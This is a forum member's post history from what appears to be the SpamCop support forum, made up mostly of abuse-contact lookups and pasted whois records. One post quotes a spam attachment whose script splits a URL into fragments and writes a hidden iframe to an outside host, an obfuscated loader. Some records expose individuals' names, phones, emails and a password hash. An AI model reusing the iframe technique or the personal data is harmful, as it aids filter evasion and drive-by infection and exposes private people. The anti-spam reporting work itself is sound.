Jump to content

Vittorio

Members
  • Content Count

    23
  • Joined

  • Last visited

Everything posted by Vittorio

  1. Abuse contact for 37.220.40.0 - 37.220.47.255 is assistenza.tecnica [ at ] smart-com.it
  2. Abuse contact for 110.10.129.0 - 110.10.129.255 is abuse [ at ] skbroadband.com
  3. Abuse contact for 141.101.62.0 - 141.101.63.255 is net4all [ at ] net4all.ch
  4. Even though I have configured mailhost correctly, today it returned me with: I tried re-configuring it to no avail. What should I do?
  5. SpamCop couldn't find the reporting address and devnull'd. Abuse contact for 118.128.0.0 - 118.131.255.255 is ipadm [ at ] lguplus.co.kr
  6. SpamCop cached whois to search-apnic-not-arin#apnic.net [ at ] devnull.spamcop.net. Instead, as KRNIC says, the abuse mail for that IP range is 'djbang [ at ] knu.ac.kr'.
  7. but https://apps.db.ripe.net/whois/lookup/ripe/...MNT-GDG-NL.html and http://abuse.net/lookup.phtml?domain=godaddy.com
  8. But https://apps.db.ripe.net/whois/lookup/ripe/...B5E59C52E.apps4 and http://abuse.net/lookup.phtml?domain=olympus.ru
  9. Vittorio

    spam Redirecting Links

    Yeah, true, many problems like that one and more could arise. I guess it's safe to say this isn't coming anytime soon. Thanks for the answers. P.s.: Does anyone know why the development of SpamCop is so slow?
  10. I'm often receiving e-mails with links which redirect to other links. Obviously, the SpamCop system only recognizes the first link in the message, and reports the issue to the ISP. The problem is: they're doing this on purpose since, that way, if the reports are taken into consideration, only the redirecting website will be closed but the real deal will not be touched. This irks me a little, since I'd like them to close the abusive websites themselves, more than the sites which redirect to them. The first ones likely create revenue (e.g.: abusive porn websites), the second ones I don't think so. So yeah. How could we deal with this? Can't SpamCop make a little check to see if a specific link redirects to another one, and report the second one as well? Afterall, the spam e-mail might not contain the second link directly, but it's as if it does, because of the redirect and all.
  11. http://www.spamcop.net/sc?id=z5456891354za...d18b371ba8c593z But, after a whois on KRNIC:
  12. A whois search on JPNIC shows this: http://whois.nic.ad.jp/cgi-bin/whois_gw?key=JP00040632 Not sure if it's a valid address.
  13. http://www.spamcop.net/sc?action=showcmd;c...0whois.ripe.net http://www.spamcop.net/sc?action=showcmd;c...0whois.ripe.net But https://apps.db.ripe.net/search/query.html?...=93.208.138.102 which results in abuse[at]t-online.de
  14. Yeah, just realised. My mistake. I'm not really an expert with this. http://whois.nic.ad.jp/cgi-bin/whois_gw?key=HH612JP Basically these are the only contacts for that website. Sad, since it doesn't seem any of them will handle the abuse report.
  15. SpamCop is refusing hostmaster[at]nic.ad.jp and abuse[at]nic.ad.jp as reporting addresses. If I try reporting to those (by adding them manually), it just won't do it. None of those appear in the e-mail sent list. I was trying to report the IP 211.133.131.48 for a phishing page.
  16. http://www.spamcop.net/sc?action=showwhois...=211.47.157.207 whois.apnic.net redirects to krnic Question: what should we use? noc[at]hilineisp.net, according to that whois information, or what abuse.net tells as abuse addresses for that? http://www.abuse.net/lookup.phtml?domain=hilineisp.net
  17. http://www.spamcop.net/sc?action=showcmd;c...0whois.ripe.net According to Abuse Finder:
  18. http://www.spamcop.net/sc?id=z5209101190ze...88fe3b01dd2ef9z Tracking message source: 77.243.22.19: Display data: "whois 77.243.22.19[at]whois.arin.net" (Getting contact from whois.arin.net ) Redirect to ripe Display data: "whois 77.243.22.19[at]whois.ripe.net" (Getting contact from whois.ripe.net) Lookup vt865-ripe[at]whois.ripe.net Display data: "whois vt865-ripe[at]whois.ripe.net" (Getting contact from whois.ripe.net) vt865-ripe = Lookup mk2376-ripe[at]whois.ripe.net Display data: "whois mk2376-ripe[at]whois.ripe.net" (Getting contact from whois.ripe.net) mk2376-ripe = whois.ripe.net 77.243.22.19 (nothing found) No reporting addresses found for 77.243.22.19, using devnull for tracking. but mntner: ROUTE-SRB descr: Topnet d.o.o admin-c: SG4970-RIPE upd-to: lganeva[at]mobiltel.bg auth: MD5-PW $1$Nx4Ryjrr$KQKzU67gvnU8A6BLMSCFc/ mnt-by: ROUTE-SRB referral-by: ROUTE-SRB changed: lganeva[at]mobiltel.bg 20070304 source: RIPE and person: Vladimir Tosovic address: Omladinskih brigada 21 11000 Beograd Serbia phone: +381600004422 nic-hdl: VT865-RIPE mnt-by: ROUTE-SRB changed: v.tosovic[at]vipmobile.rs 20081023 source: RIPE and person: Mina Kapor address: Omladinskih brigada 21 address: 11000 Beograd address: Serbia phone: +381600004417 phone: +381112254417 nic-hdl: MK2376-RIPE mnt-by: MNT-MINA changed: m.kapor[at]vipmobile.rs 20081023 source: RIPE Source: http://apps.db.ripe.net/search/query.html?...h#resultsAnchor The e-mails should be lganeva[at]mobiltel.bg, v.tosovic[at]vipmobile.rs and m.kapor[at]vipmobile.rs.
  19. Spammers got smarter, it seems. <HTML> <HEAD> <META http-equiv=Content-Type content="text/html; charset=iso-8859-2"> </HEAD> <BODY> <DIV style="height: 204px; left: 50%; margin: -100px 0 0 -209px; position: absolute; top: 50%; width: 408px;">Certainly the court to turn Hold of whom your hand</DIV> <!-- Eight or even an opportunity of austria Louis xiii had happened to retire Thus he might not here Nobody knows that are rich Resumed their lives of honor Is arrested and good man to kill Blood and followed them they --> <scri_pt type="text/java scri_pt"> var rcfj1 = "ht"; var rcfj2 = "tp://lmluio4.geoo"; var rcfj3 = "apiouh."; var rcfj4 = "com/?hhoyjucnxv"; document.write('<ifr'); document.write('ame src='+'"'+rcfj1+rcfj2+rcfj3+rcfj4); document.write('"></ifr'); document.write('ame>'); </scri_pt> </BODY> </HTML> But SpamCop should be even smarter and it should decypher stuff like this (it apparently doesn't as of now). This was the content of an .html attachment these type of spammers often send me. I also don't get the Certainly the court to turn Hold of whom your hand nor the Eight or even an opportunity of austria Louis xiii had happened to retire Thus he might not here Nobody knows that are rich Resumed their lives of honor Is arrested and good man to kill Blood and followed them they Er, okay.. what? Now that I think of it, it must be the same spammer which is sending me a different type of spam. Before, they sent me messages directly containing those senseless words and a link in the message's body. Now, those words are inside the .html, while the message itself KIND OF makes sense (even if it now contains no URLs). Why do thy write that stuff? What do they use that gibberish for? I hoped I had gotten rid of those stupid spammers, but I guess not. Any hint about how to completely get rid of them..? It's probably impossible, but I'll ask anyways. I wish I finally stopped receiving those stupid messages in my e-mail. No, sadly changing e-mail address isn't an option, nor will reporting harm them much, if at all.
  20. Vittorio

    "Ninja" Attachments

    Bump. This is getting annoying, and spammers are getting away with their hidden HTML links.
  21. http://www.spamcop.net/sc?id=z5207480481ze...f7443806410b65z Tracking message source: 62.240.25.2: Display data: "whois 62.240.25.2[at]whois.ripe.net" (Getting contact from whois.ripe.net) Lookup art12-ripe[at]whois.ripe.net Display data: "whois art12-ripe[at]whois.ripe.net" (Getting contact from whois.ripe.net) art12-ripe = whois.ripe.net 62.240.25.2 (nothing found) No reporting addresses found for 62.240.25.2, using devnull for tracking. but inetnum: 62.240.25.0 - 62.240.25.255 netname: NN-ARTCOMBB6-NET descr: CyberMedia Batajnica country: CS admin-c: ART12-RIPE tech-c: ART12-RIPE status: ASSIGNED PA mnt-by: rankorodic-mnt changed: rrodic[at]gmail.com 20090309 source: RIPE Source: http://apps.db.ripe.net/whois/lookup/ripe/...240.25.255.html and person: Ranko Rodic address: Zdravka Celara 12 11000 Belgrade, Serbia phone: +381116973079 nic-hdl: ART12-RIPE mnt-by: rankorodic-mnt changed: mika[at]artcommunication.rs 20110504 source: RIPE Source: http://apps.db.ripe.net/whois/lookup/ripe/...orodic-mnt.html mika[at]artcommunication.rs and rrodic[at]gmail.com. Not sure which of the two is the best one to report to, since I'm not very experienced, but I'd report it to the last one.
  22. http://www.spamcop.net/sc?id=z5206801922zb...105379ec6e23a2z Tracking message source: 88.255.130.175: Display data: "whois 88.255.130.175[at]whois.ripe.net" (Getting contact from whois.ripe.net) Lookup vt1034-ripe[at]whois.ripe.net Display data: "whois vt1034-ripe[at]whois.ripe.net" (Getting contact from whois.ripe.net) vt1034-ripe = whois.ripe.net 88.255.130.175 (nothing found) No reporting addresses found for 88.255.130.175, using devnull for tracking. inetnum: 88.255.130.0 - 88.255.130.255 netname: HerisSeramik descr: Ataturk Bulvar& #305; 5 . Km 43100 Kutahya country: TR admin-c: VT1034-RIPE tech-c: VT1034-RIPE status: ASSIGNED PA mnt-by: AS9121-MNT changed: ipg[at]turktelekom.com.tr 20061002 source: RIPE Source: https://apps.db.ripe.net/whois/lookup/ripe/...D204A0EDD.apps4 The e-mail address is supposed to be ipg[at]turktelekom.com.tr.
  23. Hope I'm doing it right, since it's my first time reporting something like this. http://www.spamcop.net/sc?id=z5199645989z7...8e734a606b83afz Tracking message source: 188.10.55.68: Display data: "whois 188.10.55.68[at]whois.arin.net" (Getting contact from whois.arin.net ) Redirect to ripe Display data: "whois 188.10.55.68[at]whois.ripe.net" (Getting contact from whois.ripe.net) Lookup tt616-ripe[at]whois.ripe.net Display data: "whois tt616-ripe[at]whois.ripe.net" (Getting contact from whois.ripe.net) tt616-ripe = whois.ripe.net 188.10.55.68 (nothing found) No reporting addresses found for 188.10.55.68, using devnull for tracking. inetnum: 188.8.0.0 - 188.11.255.255 netname: IPTV-SERVICES descr: Telecom Italia S.p.A.IPTV Platform country: IT admin-c: TT616-RIPE tech-c: TT616-RIPE status: ASSIGNED PA mnt-by: TIWS-MNT mnt-lower: TIWS-MNT mnt-routes: TIWS-MNT source: RIPE # Filtered person: Thomas Tozzi address: Telecom Italia S.p.A. phone: +39 6 368885 nic-hdl: TT616-RIPE mnt-by: TIN-MNT mnt-by: TIWS-MNT mnt-by: EASY-MNT source: RIPE # Filtered % Information related to '188.10.0.0/16AS3269' route: 188.10.0.0/16 descr: INTERBUSINESS origin: AS3269 mnt-by: TIWS-MNT mnt-routes: INTERB-MNT source: RIPE # Filtered Abuse mailbox: abuse[at]retail.telecomitalia.it Source: https://apps.db.ripe.net/whois/lookup/ripe/mntner/TIN-MNT.html On Spamcop.net it said the address in the title, so I thought there must've been something wrong. Then I came to know that it's not the first time spammers do that. I got the mailbox by clicking on "TIN-MNT" in the mnt-by links which came up after manually looking up 188.10.55.68 on Ripe. I also found this address, which might be useful since the manager of that network should be him: thomas.tozzi[at]telecomitalia.it But I doubt you send reports to that e-mail. Hope I helped.
×